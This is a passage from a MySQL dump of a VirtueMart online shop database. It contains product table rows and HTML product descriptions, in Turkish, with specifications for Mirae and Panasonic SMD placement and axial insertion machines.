00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',0,0,1,1,1,0,0,'2020-02-11 18:55:07',676,'2020-11-26 06:53:05',676,'0000-00-00 00:00:00',0),(60,1,0,'NM-EJM6E','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2020-11-22 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',4,NULL,'','','','',0,0,1,1,0,0,0,'2020-11-22 06:37:25',676,'2020-11-22 16:28:22',676,'0000-00-00 00:00:00',0),(61,1,0,'NM-EJM6E','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2020-11-22 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','',0,0,1,1,1,0,0,'2020-11-22 16:53:58',676,'2020-11-26 06:52:20',676,'0000-00-00 00:00:00',0),(66,1,0,'NM-EJR5A','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',0,0,1,1,1,0,0,'2020-11-26 07:27:23',676,'2020-11-26 08:10:18',676,'0000-00-00 00:00:00',0),(63,1,0,'NM-EJM5E','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',0,0,1,1,1,0,0,'2020-11-23 08:36:31',676,'2020-11-26 06:51:28',676,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_products` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_products_en_gb`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_products_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_products_en_gb` (
  `virtuemart_product_id` int unsigned NOT NULL,
  `product_s_desc` varchar(2000) NOT NULL DEFAULT '',
  `product_desc` text NOT NULL,
  `product_name` varchar(180) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` varchar(255) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_product_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_products_en_gb`
--

LOCK TABLES `fz6t4_virtuemart_products_en_gb` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_products_en_gb` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_products_en_gb` VALUES (3,'MX200LP - IPC: 15,000cph','<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left; margin-left: 30px;\">MIRAE MX200LP SMD Dizgi Makinesi</p>\r\n<ul>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum Hız: 15,000cph</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Pratik Hız: 9,000-12,500cph</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum 680x460x5.0mm PCB</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Lineer Enkoder (2um çözünürlüklü)</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Servo Motor</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">0.025mm tekrarlama doğruluğu</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">8, 12, 16, 24, 32, 44, 56, 72, 88mm besleyiciler + Tepsi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Intelligent Feeders</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Windows tabanlı MMI</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table style=\"border-collapse: collapse; width: 633px; height: 279px; margin-left: 60px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><colgroup><col style=\"width: 236pt;\" width=\"394\" /> <col style=\"width: 412pt;\" width=\"686\" /> </colgroup>\r\n<tbody>\r\n<tr>\r\n<td width=\"394\" height=\"21\">\r\n<p>MODEL ADI</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>MX200LP</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>PCB Boyutları</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>680mm x 460mm x 5mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Dizilebilen Malzeme Aralığı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>0201 chip - 35mm kare IC</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Dizgi Hassasiyeti</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>±0.025 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Maksimum Dizgi Hızı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>15,000 cph</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Pratik Dizgi Hızı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>9,000 - 12,500 cph</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Maksimum Feeder Sayısı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>80 adet (8mm tape)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Şerit Besleyiciler</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>8, 12, 16, 24, 32, 44, 56, 72, 88mm (Elektrikli)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Titreşim Besleyiciler</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>Dökme, tüp, çubuk (Frekans ve güçayarlanabilir)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>Tepsi sabitleyiciler</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Lazer Hizalama</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>Opsiyon</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Vision Sistemi</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>Cognex Vision</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Boyutlar</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>W 2330 mm x D 1900mm x H 1500mm</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Malzemeler\" />\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Boyut Olarak;</li>\r\n</ul>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">0201 chip – 35mm kare IC (standart) veya 50mm kare IC (Vision Opsiyonu ile)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Malzeme paketlenmesi</li>\r\n</ul>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Makara</li>\r\n<li style=\"text-align: left;\">Tüp</li>\r\n<li style=\"text-align: left;\">Dökme</li>\r\n<li style=\"text-align: left;\">Kesik</li>\r\n<li style=\"text-align: left;\">Şerit</li>\r\n<li style=\"text-align: left;\">Tepsi&nbsp;</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Malzeme Paket Tipi</li>\r\n</ul>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Chip (0201,0402,0603,…)</li>\r\n<li style=\"text-align: left;\">SOIC</li>\r\n<li style=\"text-align: left;\">PLCCQ</li>\r\n<li style=\"text-align: left;\">FPBGA,</li>\r\n<li style=\"text-align: left;\">CSP (Vision Opsiyonu ile)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<div style=\"text-align: left;\">&nbsp;</div>','MX200LP','','','','mx200lp'),(2,'Desktop SMD P&P - 3,000cph','<h2>LE40V Precision Desktop SMD Placement Machine</h2>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<ul style=\"background-image: background-color: #ffffff; font-family: Tahoma, Helvetica, Arial, sans-serif; text-align: left;\">\r\n<li>Orta/D&uuml;ş&uuml;k hacimli işletmeler i&ccedil;in gelişmiş teknolojili SMT dizgi sistemidir</li>\r\n<li>Cognex Vision sistemli kameralı malzeme hizalama ile hemen&nbsp;her tip&nbsp;malzemenin hassas dizgisi m&uuml;mk&uuml;nd&uuml;r</li>\r\n<li>Sınıfındaki en iyi grafik aray&uuml;z ile dakikalar i&ccedil;inde kolay programlama</li>\r\n<li>0201 chip malzemeden 15mil bacak aralıklı QFP\'ye kadar geniş aralıktaki malzemeleri dizebilme</li>\r\n<li>Kapalı &ccedil;evrim ile kontrol edilen hassas dizgi kafası</li>\r\n<li>96 adete kadar 8mm besleyici kapasitesi</li>\r\n<li>Makara, t&uuml;p, d&ouml;kme, tepsi malzeme besleyiciler</li>\r\n<li>Kafa &uuml;zerinde kameralı, lazer veya mekanik hizalama</li>\r\n<li>Otomatik nozzle değiştirme&nbsp;</li>\r\n<li>Harici have bağlantısına ihtiya&ccedil; duymayan sistem</li>\r\n</ul>\r\n<p style=\"text-align: left;\"><img src=\"images/ddm/LE40V.JPG\" alt=\"\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; text-align: left;\" /></p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" style=\"border-collapse: collapse;\" cellspacing=\"0\" cellpadding=\"0\"><colgroup><col /><col /></colgroup>\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p>MODEL ADI</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>LE40V</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>PCB Boyutları</p>\r\n</td>\r\n<td>\r\n<p>343mm x 560mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizilebilen Malzeme Aralığı</p>\r\n</td>\r\n<td>\r\n<p>0201 chip - 35mm kare IC</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizgi Hassasiyeti</p>\r\n</td>\r\n<td>\r\n<p>&plusmn;0.025 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizilebilen IC Bacak Aralığı</p>\r\n</td>\r\n<td>0.381mm</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Dizgi Hızı</p>\r\n</td>\r\n<td>\r\n<p>3000 cph</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Pratik Dizgi Hızı</p>\r\n</td>\r\n<td>\r\n<p>1800-2500 cph</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Hareket Alanı</p>\r\n</td>\r\n<td>\r\n<p>560mm x 560mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Feeder Sayısı</p>\r\n</td>\r\n<td>\r\n<p>96 adet (8mm tape)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Şerit Besleyiciler</p>\r\n</td>\r\n<td>\r\n<p>8, 12, 16, 24, 32, 44mm (Elektrikli)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Titreşim Besleyiciler</p>\r\n</td>\r\n<td>\r\n<p>D&ouml;kme, t&uuml;p, &ccedil;ubuk (Frekans ve g&uuml;&ccedil;ayarlanabilir)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td>\r\n<p>Tepsi sabitleyiciler</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Lazer Hizalama</p>\r\n</td>\r\n<td>\r\n<p>Opsiyon</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Vision Sistemi</p>\r\n</td>\r\n<td>Cognex Vision</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dispenser Opsiyonu</p>\r\n</td>\r\n<td>10,000 nokta/saat</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Boyutlar</p>\r\n</td>\r\n<td>\r\n<p>W 1016 mm x D 1067mm x H 635mm</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Boyut Olarak;</li>\r\n</ul>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">0201 chip &ndash; 35mm kare IC (standart) veya 50mm kare IC (Vision Opsiyonu ile)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Malzeme paketlenmesi</li>\r\n</ul>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Makara</li>\r\n<li style=\"text-align: left;\">T&uuml;p</li>\r\n<li style=\"text-align: left;\">D&ouml;kme</li>\r\n<li style=\"text-align: left;\">Kesik</li>\r\n<li style=\"text-align: left;\">Şerit</li>\r\n<li style=\"text-align: left;\">Tepsi&nbsp;</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Malzeme Paket Tipi</li>\r\n</ul>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Chip (0201,0402,0603,&hellip;)</li>\r\n<li style=\"text-align: left;\">SOIC</li>\r\n<li style=\"text-align: left;\">PLCCQ</li>\r\n<li style=\"text-align: left;\">FPBGA,</li>\r\n<li style=\"text-align: left;\">CSP (Vision Opsiyonu ile)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<div style=\"text-align: left;\">&nbsp;</div>','LE-40V','','','','le-40v'),(4,'Max: 100,000cph / 8-104mm feeder / Tray Ünitesi','<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"text-align: left; margin-left: 30px;\">PANASONIC SMD Dizgi Makinesi</p>\r\n<ul>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum Hız: 100,000cph</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">3, 8 ve 12 kafa seçenekleri</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum 510 x 460mm PCB</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Servo Motor</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">0.035mm dizgi hassasiyeti</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">01005 ile 100x90mm arası malzemelerin dizgisi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">8 - 104mm feederler + Tray Ünitesi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Gelişmiş MMI</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Modüler ve esnek</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Hızlı ürün dönüşümü</li>\r\n</ul>\r\n<p style=\"text-align: left; margin-left: 30px;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table style=\"border-collapse: collapse; width: 633px; height: 279px; margin-left: 60px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><colgroup><col style=\"width: 236pt;\" width=\"394\" /><col style=\"width: 412pt;\" width=\"686\" /></colgroup>\r\n<tbody>\r\n<tr>\r\n<td width=\"394\" height=\"21\">\r\n<p>MODEL ADI</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>CM-602-L</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>PCB Boyutları</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>510 x 460mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Dizilebilen Malzeme Aralığı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>01005 chip - 100x90mm konnektör</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Dizgi Hassasiyeti</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>±0.035 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Maksimum Dizgi Hızı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>100,000cph (12 kafa) - 75,000cph (8 kafa)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Maksimum Feeder Sayısı</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>216 adet (8mm tape)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Şerit Besleyiciler</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>8 - 104mm feeder, bulk feeder, tray unit</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>Tepsi sabitleyiciler</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"394\" height=\"18\">\r\n<p>Boyutlar</p>\r\n</td>\r\n<td width=\"686\">\r\n<p>W 2350mm x D 2290mm x H 1430mm</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Malzemeler\" />\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>','CM-602-L','','','','cm-602-l'),(5,'Axial Insertion','<h2 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">Panasonic High-Speed Axial Insertion Machine</h2>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/panasonic/av132.jpg\" alt=\"\" width=\"400\" height=\"271\" />&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px;\">\r\n<ul style=\"font-size: 10px; text-align: start;\">\r\n<li><strong>Saatte 22,000 komponent dizgi hızı</strong></li>\r\n<li><strong>Otomatik koordinat d&uuml;zeltme fonksiyonu ile g&uuml;venilir dizgi</strong></li>\r\n<li><strong>Dikey malzeme besleyiciler ile&nbsp;arttırılmış kapasite ve d&uuml;ş&uuml;r&uuml;lm&uuml;ş &uuml;r&uuml;n d&ouml;n&uuml;ş&uuml;m zamanı</strong></li>\r\n<li><strong>Azaltılmış &ccedil;alışma maliyetleri</strong></li>\r\n<li><strong>Makinenin &ouml;n ve arka tarafları i&ccedil;in bağımsız kontrol panelleri</strong></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"1\" id=\"zebra-blue\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; margin: auto 4.8pt; border: 1pt outset;\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">MODEL ADI</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">AV132</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Model No</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">NM-EJ5A / 6A</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Boyutları</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">L 150mm x W 50mm -&nbsp;&nbsp;L 508mm x W 381mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Max. Hız</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">22,000 komponent / saat</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Komponent Sayısı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">60 + 60 + JW</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Uygulanabilir Komponentler</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Resistors 1/8 W, 1/6 W,1/4 W, &frac12; W, jumper wires (tin-plated), Diyodes, Cylindrical ceramic capacitors</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Malzeme Alış</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Sequencer Y&ouml;ntemi</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Değiştirme Zamanı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">2.0 s</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Yerleştirme Y&ouml;n&uuml;</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">4 y&ouml;n (0, 90, 180, -270)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">G&uuml;&ccedil; Kaynağı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">3 faz AC 200 V&nbsp;&nbsp;4 kVA</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Hava Kaynağı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,5 MPa, 150 L/min (A.N.R)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Boyutlar</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">W 4050 mm x D 1900mm x H 